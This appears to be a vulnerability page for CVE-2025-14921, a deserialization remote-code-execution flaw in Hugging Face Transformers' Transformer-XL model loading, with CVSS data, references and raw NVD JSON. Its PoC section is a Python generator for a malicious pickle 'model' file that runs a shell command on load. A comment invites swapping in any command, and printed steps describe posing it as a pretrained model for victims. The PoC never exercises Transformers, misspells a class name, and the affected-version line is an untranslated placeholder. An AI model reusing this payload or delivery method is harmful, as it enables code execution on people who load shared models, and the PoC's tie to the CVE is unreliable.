CVE-2025-14921

Description

Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:* - VULNERABLE

Hugging Face Transformers (Transformer-XL Model) < 修复版本

具体受影响版本需查阅官方安全公告或升级日志

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14921 PoC - Malicious Transformer-XL Model File Generator
# This PoC demonstrates the vulnerability in Hugging Face Transformers
# WARNING: For educational and security research purposes only

import pickle
import os

class MaliciousPayload:
    """
    Malicious class that executes code during pickle deserialization.
    This demonstrates the insecure deserialization vulnerability in Transformers.
    """
    def __reduce__(self):
        # This will execute arbitrary code during unpickling
        # Replace 'whoami' command with any desired system command
        return (os.system, ('whoami',))

def create_malicious_model():
    """
    Generate a malicious pickle file that exploits the deserialization vulnerability.
    When loaded by vulnerable Transformers library, the payload will be executed.
    """
    # Create malicious payload object
    malicious_obj = MaliciousPayload()
    
    # Serialize to pickle format
    # In real attack, this would be disguised as a Transformer-XL model file
    pickle_data = pickle.dumps(malicious_obj)
    
    # Save as fake model file
    model_path = 'malicious_transformer_xl_model.bin'
    with open(model_path, 'wb') as f:
        f.write(pickle_data)
    
    print(f'[+] Malicious model file created: {model_path}')
    print(f'[+] File size: {os.path.getsize(model_path)} bytes')
    return model_path

def simulate_vulnerable_load(model_path):
    """
    Simulate how vulnerable Transformers code would load the malicious model.
    In real scenario, this would be triggered by transformers.TransfoemerXLModel.from_pretrained()
    """
    print(f'[*] Simulating vulnerable model loading...')
    try:
        with open(model_path, 'rb') as f:
            # This is the vulnerable pattern - direct pickle.load without validation
            model_data = pickle.load(f)
            print('[+] Model loaded successfully')
    except Exception as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    print('='*60)
    print('CVE-2025-14921 - Transformer-XL Deserialization RCE PoC')
    print('='*60)
    
    # Generate malicious model file
    model_path = create_malicious_model()
    
    # Note: In real attack scenario, this file would be hosted on a website
    # or distributed as a 'pretrained model' for users to download and load
    print('\n[!] In real attack scenario:')
    print('    1. Attacker hosts this file as a "pretrained model"')
    print('    2. Victim downloads and loads with TransformerXLModel.from_pretrained()')
    print('    3. Arbitrary code executes in victim\'s context')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14921
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14921
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14921/
[4] VulDB https://vuldb.com/cve/CVE-2025-14921
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1149/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14921", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:47.340", "lastModified": "2026-01-21T16:44:06.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:*", "matchCriteriaId": "A0D191EE-0D6C-4D5D-A1B7-C19000D57F1C"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1149/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}